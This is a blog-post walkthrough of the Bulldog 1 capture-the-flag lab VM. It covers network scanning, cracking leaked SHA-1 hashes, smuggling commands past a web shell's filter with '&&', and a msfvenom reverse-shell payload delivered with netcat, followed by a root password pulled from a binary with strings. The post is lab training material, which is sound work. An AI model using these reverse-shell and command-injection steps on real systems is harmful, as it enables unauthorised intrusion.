Amonsec

It's all about security.

A simple blog where you can find different things about digital security.

Bulldog 1: CTF walkthrough

Introduction

Name: Bulldog 1
Date release: 28 Aug 2017
Author: Nick Frichette
Series: Bulldog

You can find the virtual machine and the description of the CTF in Vulnhub at this address: https://www.vulnhub.com/entry/bulldog-1,211/

Note, this VM don’t work with VMWare workstation/Fusion, that’s why after few tries I decided to install VirtualBox (ew, disgusting).

 

Recognition

First of all, we need to find the IP address of the VM, we can use netdiscover or arp-scan.

root@kali:~/Desktop# arp-scan --localnet
bulldog_1_ctf_walkthrough_arp_scan.png

Now, we can scan the target in order to find which services are running inside this virtual machine.

For that, I use the well known network scanner nmap.

root@kali:~/Desktop# nmap -T5 -A -O --reason -p- 192.168.1.41
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST

Warning: 192.168.1.41 giving up on port because retransmission cap hit (2).
Nmap scan report for pc-240.home (192.168.1.41)
Host is up, received arp-response (0.00061s latency).
Not shown: 65185 closed ports, 347 filtered ports
Reason: 65185 resets and 347 no-responses
PORT     STATE SERVICE REASON         VERSION
23/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|_  256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
80/tcp   open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms pc-240.home (192.168.1.41)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds
root@kali:~/Desktop#

Two interesting service are running, an Python HTTP server (WSGIServer) maybe for a Django web application, and an SSH service (OpenSSH 7.2p2).

Now, we will focus our research in this web site.

 

Website analyse

The index of the web site don’t give use useful information, except the name of one employee.
I decided to actively enumerate the target with a tool used to brute-force URL(s) called gobuster.

bulldog_1_ctf_walkthrough_gobuster.png

The /admin/ and the /dev/ directories sound interesting.

The admin directory is a login form and after some research I didn’t found vulnerabilities, so, I moved into the second directory.

In the index of the second directory we can find an explication of the project and how the new team is structured and a web-shell, who is inconveniently, usable only for logged user.At this point, I knew I had to find credentials in order to to log in the admin panel and then use the web-shell. After few tries and without success, I knew I had missed something.Yep, I missed something called the source code.

The index of the /dev/ directory has more things than expected, SHA-1 password.

bulldog_1_ctf_walkthrough_source_code.png

I managed to find the plain text of two password:

ddf45997a7e18a25ad5f5cf222da64814dd060d5:bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e:bulldoglover

We log into admin panel with one of this password and then we will be able to use the web shell.

bulldog_1_ctf_walkthrough_web_shell.png
 

Bypassing the set of available commands

At first look we can only use six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we can’t use semicolon.

We can’t use semicolon, but maybe if I use an ampersand that will work. And yes that works and that allow use to execute any commands we want on the targeted server.

bulldog_1_ctf_walkthrough_bypassing_command_filter.png

We can remotely execute arbitrary code, it’s just a question of second before we can get a reverse shell.

We generate a malicious ELF file with msfvenom:

root@kali:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rshell

We send the malicious file into the targeted server:

#Web shell
ls && nc -lp 1337 > /tmp/rshell

#Attacker
root@kali:~/Desktop# nc -nvv 192;168.1.41 1337 < rshell
bulldog_1_ctf_walkthrough_send_rshell.png

We change the permission of the file:

#Web shell
ls && chmod 777 /tmp/rshell

Finally we can execute the reverse shell and then spawn a pseudo TTY:

#Attacker
root@kali:~/Desktop# nc -lnvvp 1337

#Web shell
ls && /tmp/rshell
bulldog_1_ctf_walkthrough_reverse_shell.png
 

Privilege escalation

We have a low privilege shell, now, our job is to find a way to gain an root access to this server.
After few minutes I found an hidden directory inside the bulldogadmin home folder:

django@bulldog:/home/$ cd buldogadmin/.hiddendirectory

In this directory we have two things an ASCII file and an x64 ELF binary:

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp           
pile customPermissionAp 
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ 
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ file note
file note
note: ASCII text, with very long lines
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$

The first thing that I try with this ELF file is to search for any kind of strings that I can found inside the compiled binary and fortunately for us, this ELF file contain a password:

django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
<gadmin/.hiddenadmindirectory$ strings customPermissionApp                   
[..snip..]
SUPERultH
imatePASH
SWORDyouH
CANTget
[..snip..]
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$

The complet password is: SUPERultimatePASSWORDyouCANTget

bulldog_1_ctf_walkthrough_rooted.png
 
 

break